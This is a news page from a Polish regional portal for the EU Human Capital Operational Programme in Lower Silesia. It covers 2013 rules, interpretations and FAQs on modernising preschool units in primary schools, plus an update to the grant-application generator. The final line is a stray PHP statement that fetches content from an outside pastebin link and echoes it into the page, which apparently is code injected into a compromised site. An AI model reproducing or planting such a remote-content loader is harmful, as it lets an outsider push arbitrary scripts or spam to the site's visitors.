Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

31.10.2013

Interpretacje MRR w zakresie modernizacji oddziałów przedszkolnych w szkołach podstawowych

Poniżej przedstawiamy interpretacje IZ PO KL dotyczące możliwości doposażenia kuchni oraz limitów na poszczególne kategorie wydatków określone w Zasadach przygotowania, realizacji i rozliczania projektów systemowych w ramach Poddziałania 9.1.1 PO KL. Dodatkowo publikujemy bazę FAQ zawierającą zbiór odpowiedzi na najczęściej zadawane pytania dotyczące projektów systemowych w zakresie modernizacji oddziałów przedszkolnych w szkołach podstawowych.

 Interpretacja – doposażenie kuchni

 Interpretacja – place zabaw

 FAQ

 Baza FAQ

10.09.2013

Modernizacja oddziałów przedszkolnych – odpowiedzi na pytania ze spotkań informacyjnych

Publikujemy odpowiedzi na pytania, jakie zostały zadane podczas spotkań informacyjnych dot. projektu systemowego Modernizacja oddziałów przedszkolnych, które odbyły się w dniach 27 i 29 sierpnia 2013r.

 Dokument do pobrani

Generator Wniosków Aplikacyjnych wersja 8.7

Informujemy, że IZ PO KL udostępniła nową wersję 8.7 Generatora Wniosków Aplikacyjnych PO KL. Zmiana wersji podyktowana jest przede wszystkim dostosowaniem aplikacji do obsługi nowych wskaźników w związku z przeglądem śródokresowym Priorytetu V.

Zakres zmian wprowadzonych w GWA zmian obejmuje m.in.:

- aktualizację słownikow wskaźnikow pomiaru celu dla Priorytetu V (tabele 3.1.2 i 3.1.3)
- dostosowanie słowników efektów realizacji PO KL dla Priorytetu V (tabela 3.5)
- dodanie po stronie Konwertera danych do KSI w polu "Kraj" pozycji "CZ Czechy"
- wprowadzenie komunikatu o przetwarzaniu przez GWA na stacji uzytkownika plików Cookies oraz udostępnienie polityki prywatności w tym zakresie
- dostosownie interfejsu GWA mające na celu dynamiczne wyświetlanie w przeglądarkach stopki z wersją publikacji GWA

Generator w wersji 8.7 dostepny jest pod adresem  https://www.generatorwnioskow.efs.gov.pl/GWA87/  i będzie obowiązywał od 16 września 2013 r.

Równolegle pod głównym adresem nadal dostępna jest wersja 8.6 GWA. Z dniem 16 września dostępna będzie wyłącznie wersja 8.7, natomiast wersja 8.6 zostanie wyłączona.

Należy podkreślić, że wraz z dniem obowiązywania nowej wersji GWA wszystkie wnioski o dofinansowanie projektu będa mogly być składane wyłącznie przy użyciu nowej wersji.

05.09.2013

Modernizacja oddziałów przedszkolnych - prezentacje ze spotkań informacyjnych

Publikujemy prezentacje ze spotkań informacyjnych dot. projektu systemowego Modernizacja oddziałów przedszkolnych, które odbyły się w dniach 27 i 29 sierpnia 2013r.

 Modernizacja oddziałów przedszkolnych

 Przygotowanie WND

Informacja dotycząca zasad naboru i realizacji projektów systemowych oddziałów przedszkolnych w szkołach podstawowych w ramach Priorytetu IX PO KL

Instytucja Pośrednicząca PO KL województwa dolnośląskiego pragnie poinformować o zasadach przystąpienia do realizacji projektów systemowych w ramach Poddziałania 9.1.1 w latach 2013 – 2015.

Procedura przygotowania i oceny oraz realizacja projektów systemowych odbywać się będzie w oparciu o zapisy Zasad przygotowania, realizacji i rozliczania projektów systemowych w ramach Poddziałania 9.1.1 PO KL w zakresie przygotowania oddziałów przedszkolnych w szkołach podstawowych do świadczenia wysokiej  jakości usług na rzecz dzieci w wieku przedszkolnych obowiązujących od 3 lipca 2013 r., zwanych dalej Zasadami, stanowiących część Systemu Realizacji PO KL.


Jednocześnie Instytucja Pośrednicząca, w przypadku zmiany Zasad… lub innych dokumentów programowych przez Instytucję Zarządzającą zastrzega możliwość dokonania zmian z tego tytułu w niniejszej Informacji.

 Informacja o naborze

 Załączniki

Przyjęcie dokumentu Zasady przygotowania, realizacji i rozliczania projektów systemowych w ramach Poddziałania 9.1.1 Programu Operacyjnego Kapitał Ludzki

3 lipca 2013 r. podsekretarz stanu w Ministerstwie Rozwoju Regionalnego Paweł Orłowski podpisał dokument "Zasady przygotowania, realizacji i rozliczania projektów systemowych w ramach Poddziałania 9.1.1 PO KL w zakresie przygotowania oddziałów przedszkolnych w szkołach podstawowych do świadczenia wysokiej jakości usług na rzecz dzieci w wieku przedszkolnym".

Dokument ten stanowi część Systemu realizacji Programu Kapitał Ludzki (PO KL) i określa główne zasady realizacji projektów systemowych w zakresie modernizacji oddziałów przedszkolnych w szkołach podstawowych.

Najważniejsze kwestie uregulowane w dokumencie dotyczą:

- form i zakresu wsparcia udzielanego w ramach projektów systemowych przewidzianych do realizacji w Poddziałaniu 9.1.1 PO KL;

- szczegółowych zasad realizacji projektów systemowych, obejmujących założenia merytoryczne wdrażania projektów, odnoszące się do kategorii beneficjentów systemowych, grup docelowych (wykaz oddziałów przedszkolnych w szkołach podstawowych kwalifikujących się do objęcia wsparciem w ramach projektów) oraz katalogu wydatków kwalifikowalnych w ramach projektów;

- założeń finansowych realizacji projektów;

- założeń dotyczących konstruowania wniosku o dofinansowanie projektów.

 Zasady przygotowania, realizacji i rozliczania projektów systemowych w ramach Poddziałania 9.1.1 PO KL w zakresie przygotowania oddziałów przedszkolnych w szkołach podstawowych do świadczenia wysokiej jakości usług na rzecz dzieci w wieku przedszkolnym

 Zestawienie uwag z konsultacji społecznych

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");